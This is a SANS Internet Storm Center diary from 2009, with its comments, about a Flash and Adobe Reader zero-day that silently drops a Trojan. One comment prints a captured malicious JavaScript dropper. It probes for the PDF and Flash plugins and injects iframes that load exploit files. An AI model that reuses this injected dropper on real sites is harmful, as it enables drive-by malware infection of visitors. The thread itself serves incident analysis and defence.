YA0D (Yet Another 0-Day) in Adobe Flash player

YA0D (Yet Another 0-Day) in Adobe Flash player
Well, it looks like the last two weeks have definitely been marked by multiple 0-day exploits actively used in the wild. The last one exploits a vulnerability in Adobe Flash player (versions 9 and 10) as well as Adobe Reader and Acrobat 9.1.2. Besides being a 0-day there are some other interesting things about this exploit. First, several AV companies reported that they detected this 0-day exploit in PDF files, so at first it looked like an Adobe Reader vulnerability. However, the vulnerable component is actually the Flash player or, better said, the code used by the Flash player which is obviously shared with Adobe Reader/Acrobat. This increases the number of vectors for this attack: the malicious Flash file can be embedded in PDF documents which will cause Adobe Reader to execute it OR it can be used to exploit the Flash player directly, making it a drive-by attack as well. And indeed, when tested with Internet Explorer and the latest Flash player (version 10), the exploit silently drops a Trojan and works "as advertised". Another interesting thing I noticed is that the Trojan, which is downloaded in the second stage, is partially XOR-ed – the attackers probably did this to evade IDSes or AV programs scanning HTTP traffic. At the moment, the detection for both the exploit and the Trojan is pretty bad (only 5/41 for the Trojan, according to VirusTotal). It appears that even when JavaScript support is disabled in Adobe Reader that the exploit still works, so at the moment there are no reliable protection mechanisms (except not using Adobe Reader?). Regarding Flash, NoScript is your best help here, of course. -- Bojan I will be teaching next: Web App Penetration Testing and Ethical Hacking - SANS Baltimore Fall: Virtual Edition 2021	Bojan 400 Posts ISC Handler Jul 22nd 2009
Thread locked Subscribe	Jul 22nd 2009 1 decade ago
I have a ??, has anyone checked the effects Global Privacy Settings may have.I have max sec and always use no script. Changing some of these settings may help with Flash in Acrobat. Some of the setting I have found helpful... 1. None for storing information on your computer. 2. Do not allow thrid party flash content to store data on your computer. 3. Do not store common flash components. 4. Deny other sites from accessing information from other sites using an older system security. 5. Do not allow access to input, cam, mic, etc. 6. Web site storage settings to none. At the very least you should get a message when downloading content or the attempt to download and you can deny but still access the PDF, just not the media. Access the Setting manager... http://www.macromedia.com/support/documentation/en/flashplayer/help/ Just a ??	drStrangeP0rk 11 Posts
Quote	Jul 23rd 2009 1 decade ago
I have this on multiple sites. I did not catch the exploit event on the site as it was a shared server but it traversed my entire html tree and added iframe code to all of my landing pages (html and php). The obfuscated code calls out to a server in china and checks the browser. here is a capture launched from firefox: ##script## function LWrite(sCn) { document.write(sCn); } if(navigator.userAgent.indexOf('MSIE') != -1) { PDF = new Array('AcroPDF.PDF', 'PDF.PdfCtrl'); for(i in PDF) { try { obj = new ActiveXObject(PDF[i]); if (obj) { LWrite('<iframe src=hereEvil.pdf></iframe>'); } } catch(e){} } try { obj = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); if (obj) { LWrite('<iframe src=sinceDummyMiddle.swf></iframe>'); } } catch(e){} } else { for(i = 0; i <= navigator.plugins.length; i++) { var plugin = navigator.plugins[i].name; if((plugin.indexOf('Adobe Acrobat') != -1) \|\| (plugin.indexOf('Adobe PDF') != -1)) { LWrite('<iframe src=hereEvil.pdf></iframe>'); } if(plugin.indexOf('Flash') != -1) { LWrite('<iframe src=sinceDummyMiddle.swf></iframe>'); } } } ##/script##	drStrangeP0rk 1 Posts
Quote	Jul 23rd 2009 1 decade ago
Please stop suggesting FlashBlock as a security tool whenever a Flash vulnerability surface. It's not reliable for this purpose (and never pretended to be): http://hackademix.net/2008/06/08/block-rick/	drStrangeP0rk 4 Posts
Quote	Jul 23rd 2009 1 decade ago

Well, it looks like the last two weeks have definitely been marked by multiple 0-day exploits actively used in the wild.
The last one exploits a vulnerability in Adobe Flash player (versions 9 and 10) as well as Adobe Reader and Acrobat 9.1.2. Besides being a 0-day there are some other interesting things about this exploit.

First, several AV companies reported that they detected this 0-day exploit in PDF files, so at first it looked like an Adobe Reader vulnerability. However, the vulnerable component is actually the Flash player or, better said, the code used by the Flash player which is obviously shared with Adobe Reader/Acrobat. This increases the number of vectors for this attack: the malicious Flash file can be embedded in PDF documents which will cause Adobe Reader to execute it OR it can be used to exploit the Flash player directly, making it a drive-by attack as well.

And indeed, when tested with Internet Explorer and the latest Flash player (version 10), the exploit silently drops a Trojan and works "as advertised". Another interesting thing I noticed is that the Trojan, which is downloaded in the second stage, is partially XOR-ed – the attackers probably did this to evade IDSes or AV programs scanning HTTP traffic. At the moment, the detection for both the exploit and the Trojan is pretty bad (only 5/41 for the Trojan, according to VirusTotal).

It appears that even when JavaScript support is disabled in Adobe Reader that the exploit still works, so at the moment there are no reliable protection mechanisms (except not using Adobe Reader?). Regarding Flash, NoScript is your best help here, of course.
--
Bojan

I will be teaching next: Web App Penetration Testing and Ethical Hacking - SANS Baltimore Fall: Virtual Edition 2021

Bojan

400 Posts
ISC Handler

Jul 22nd 2009

I have a ??, has anyone checked the effects Global Privacy Settings may have.I have max sec and always use no script. Changing some of these settings may help with Flash in Acrobat.
Some of the setting I have found helpful...
1. None for storing information on your computer.
2. Do not allow thrid party flash content to store data on your computer.
3. Do not store common flash components.
4. Deny other sites from accessing information from other sites using an older system security.
5. Do not allow access to input, cam, mic, etc.
6. Web site storage settings to none.

At the very least you should get a message when downloading content or the attempt to download and you can deny but still access the PDF, just not the media.

Access the Setting manager...
http://www.macromedia.com/support/documentation/en/flashplayer/help/

Just a ??

drStrangeP0rk

11 Posts

I have this on multiple sites. I did not catch the exploit event on the site as it was a shared server but it traversed my entire html tree and added iframe code to all of my landing pages (html and php). The obfuscated code calls out to a server in china and checks the browser. here is a capture launched from firefox:
##script##

function LWrite(sCn)
{
document.write(sCn);
}

if(navigator.userAgent.indexOf('MSIE') != -1)
{
PDF = new Array('AcroPDF.PDF', 'PDF.PdfCtrl');

for(i in PDF)
{
try
{
obj = new ActiveXObject(PDF[i]);

if (obj)
{
LWrite('<iframe src=hereEvil.pdf></iframe>');
}
}

catch(e){}
}

try
{
obj = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');

if (obj)
{
LWrite('<iframe src=sinceDummyMiddle.swf></iframe>');
}
}

catch(e){}
}

else
{
for(i = 0; i <= navigator.plugins.length; i++)
{
var plugin = navigator.plugins[i].name;

if((plugin.indexOf('Adobe Acrobat') != -1) || (plugin.indexOf('Adobe PDF') != -1))
{
LWrite('<iframe src=hereEvil.pdf></iframe>');
}

if(plugin.indexOf('Flash') != -1)
{
LWrite('<iframe src=sinceDummyMiddle.swf></iframe>');
}
}
}

##/script##

drStrangeP0rk
1 Posts

Please stop suggesting FlashBlock as a security tool whenever a Flash vulnerability surface.
It's not reliable for this purpose (and never pretended to be): http://hackademix.net/2008/06/08/block-rick/

drStrangeP0rk
4 Posts